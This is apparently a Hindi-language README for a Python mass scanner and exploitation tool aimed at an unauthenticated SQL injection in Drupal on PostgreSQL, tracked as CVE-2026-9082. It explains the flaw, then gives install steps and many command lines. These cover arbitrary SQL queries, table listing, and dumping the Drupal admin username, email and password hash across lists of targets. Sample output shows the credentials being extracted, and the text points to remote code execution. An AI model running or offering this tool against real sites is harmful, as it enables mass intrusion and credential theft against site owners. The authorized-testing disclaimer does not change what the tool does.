स्कैनर: CVE-2026-9082 Drupal PostgreSQL JSON:API के माध्यम से SQLi — अनधिकृत SQLi के लिए Python स्कैनर जो RCE (CISA KEV) की ओर ले जाता है
Drupal Core (PostgreSQL) में अनप्रमाणित SQL इंजेक्शन
PDO प्लेसहोल्डर नाम के दुरुपयोग के माध्यम से JSON:API फ़िल्टर ऐरे कुंजी इंजेक्शन
CVE-2026-9082 Drupal Core में एक अत्यधिक गंभीर SQL इंजेक्शन भेद्यता है, जो Drupal 8.0 से 11.3.9 चलाने वाली सभी PostgreSQL-आधारित साइटों को प्रभावित करती है। इसे 2026-05-22 को CISA Known Exploited Vulnerabilities (KEV) कैटलॉग में जोड़ा गया — वास्तविक दुनिया में सक्रिय रूप से शोषित की जा रही है।
| गंभीरता | CVSS | प्रमाणीकरण आवश्यक | हमला वेक्टर |
|---|---|---|---|
| गंभीर | 9.8+ | कोई नहीं | HTTP (JSON:API) |
pg_exec() या COPY ... PROGRAM के माध्यम से| स्थिति | संस्करण |
|---|---|
| ❌ असुरक्षित | Drupal 8.0.0 → 11.3.9 (PostgreSQL बैकएंड) |
| ✅ पैच किया गया | 11.3.10, 11.2.12, 10.6.9, 10.5.10 |
यह दोष core/modules/pgsql/src/EntityQuery/Condition.php में मौजूद है। translateCondition() विधि JSON:API फ़िल्टर पैरामीटरों से उपयोगकर्ता-नियंत्रित ऐरे कुंजियों का उपयोग करके PDO प्लेसहोल्डर नाम बनाती है। PDO केवल [a-zA-Z0-9_] को प्लेसहोल्डर नाम के रूप में पार्स करता है, इसलिए ) के बाद का कोई भी सफिक्स क्वेरी में इंजेक्ट किया गया शाब्दिक SQL बन जाता है।
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection
pg_sleep() ब्लाइंड SQLi पुष्टिpip (पायथन पैकेज मैनेजर)# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082
# Install requirements
pip install requests
बस इतना ही! केवल एक डिपेंडेंसी — requests।
python3 cve_2026_9082_scanner.py -u https://target.com --check
python3 cve_2026_9082_scanner.py -f targets.txt
targets.txt प्रारूप:
https://target1.com
target2.com
192.168.1.100
python3 cve_2026_9082_scanner.py -u https://target.com --version
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo
python3 cve_2026_9082_scanner.py -u https://target.com --admin
python3 cve_2026_9082_scanner.py -u https://target.com --tables
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10
# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60
| फ़्लैग | विवरण |
|---|---|
-u, --url | एकल लक्ष्य URL |
-f, --file | लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक) |
-o, --output | स्कैन परिणाम फ़ाइल में सहेजें |
--check | जाँचें कि लक्ष्य असुरक्षित है या नहीं |
--version | PostgreSQL संस्करण निकालें |
--dbinfo | DB उपयोगकर्ता और डेटाबेस नाम निकालें |
--admin | Drupal एडमिन क्रेडेंशियल निकालें (uid=1) |
--tables | सभी डेटाबेस टेबलों की सूची बनाएं |
--query | कस्टम SQL निष्कर्षण क्वेरी |
--threads | मास स्कैन के लिए थ्रेड (डिफ़ॉल्ट: 20) |
--timeout | HTTP अनुरोध टाइमआउट (डिफ़ॉल्ट: 30s) |
--delay | डिटेक्शन के लिए pg_sleep विलंब (डिफ़ॉल्ट: 5s) |
--no-ssl-verify | TLS प्रमाणपत्र सत्यापन छोड़ें |
--proxy | HTTP प्रॉक्सी (जैसे, http://127.0.0.1:8080) |
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-9082 - Drupal PostgreSQL SQLi ║
║ Mass Scanner + Exploitation Tool v1.0.0 ║
╚══════════════════════════════════════════════════════════════╝
CISA KEV: Added 2026-05-22 | Advisory: SA-CORE-2026-004
[*] Checking: https://vulnerable-drupal-site.com
[!!] VULNERABLE - https://vulnerable-drupal-site.com
Method: time-based (+5.2s)
Resource: node/article
[+] username: admin
[+] email: [email protected]
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...
| स्रोत | लिंक |
|---|---|
| Drupal सलाह | SA-CORE-2026-004 |
| CISA KEV | CVE-2026-9082 |
| पैच कमिट | ea9524d9 |
| NVD प्रविष्टि | CVE-2026-9082 |
| खोजकर्ता | Michael Maturi |
यह टूल केवल अधिकृत सुरक्षा परीक्षण, शैक्षिक उद्देश्यों और नैतिक शोध के लिए है।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक कोई दायित्व नहीं लेते हैं और इस प्रोग्राम के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
Ridhin V A (@ridhinva) — बग बाउंटी शिकारी और सुरक्षा शोधकर्ता
इसे इसलिए बनाया गया क्योंकि CISA KEV ने कहा कि इसका वास्तविक दुनिया में शोषण हो रहा है। अपनी Drupal साइटों को पैच करें।